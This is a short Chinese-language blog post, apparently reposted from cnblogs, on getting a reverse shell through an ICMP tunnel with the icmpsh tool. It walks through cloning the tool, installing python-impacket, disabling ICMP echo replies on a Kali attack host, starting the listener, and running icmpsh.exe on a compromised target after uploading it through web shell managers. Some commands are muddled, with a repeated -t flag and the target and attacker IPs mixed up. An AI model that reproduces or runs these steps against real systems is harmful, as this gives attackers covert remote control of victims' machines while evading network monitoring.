利用ICMP隧道反弹shell

时间：2021-09-01 16:10:57 阅读：29 评论：0 收藏：0 [点我收藏+]

（1）下载icmpsh：

git clone https://github.com/bdamele/icmpsh.git

（2）python安装类库python-impacket

apt-get install python-impacket

注：必须下载安装python-impacket，而不是python3-impacket

（3）关闭本地系统ICMP应答（即禁ping，开启系统ping将最后的1改为0即可）

sysctl -w net.ipv4.icmp_echo_ignore_all=1

（4）在kali上开始监听

python icmpsh_m.py 本机ip 目标ip 
即： 
python icmpsh_m.py 192.168.43.204 192.168.43.50

技术分享图片

（5）将icmpsh.exe传输到靶机上（尝试用哥斯拉执行命令不成功，换为蚁剑后成功）：

icmpsh.exe -t 目标ip   -t 后面接上攻击机的ip地址 
即： 
icmpsh.exe -t 192.168.43.50   -t 192.168.43.204

技术分享图片

法二

在目标机器上运行

icmpsh.exe -t 攻击机IP
即： 
icmpsh.exe -t 192.168.43.204

技术分享图片

原文：https://www.cnblogs.com/cute-puli/p/15209362.html

踩

(0)

评论一句话评论（0）

分享档案

更多>